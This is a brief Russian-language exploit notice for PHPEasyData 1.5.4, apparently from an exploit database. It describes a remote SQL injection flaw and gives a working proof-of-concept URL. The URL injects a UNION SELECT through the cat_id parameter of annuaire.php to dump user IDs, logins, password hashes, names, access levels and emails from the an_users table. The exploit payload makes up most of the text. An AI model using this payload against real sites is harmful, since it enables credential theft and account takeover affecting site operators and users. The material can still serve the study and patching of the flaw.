Программа: PHPEasyData 1.5.4
Уязвимость позволяет удаленному злоумышленнику выполнить произвольные SQL-запросы в базе данных приложения.
Эксплоит:
http://localhost/localhost/phpeasydata-1.5.4/annuaire.php?annuaire=68&sort_field=&cat_id= 4+union+select+concat_ws(0x3a3a,user_id,user_login,user_pass,user_fname,user_lname, user_access,user_email)+from+an_users/*
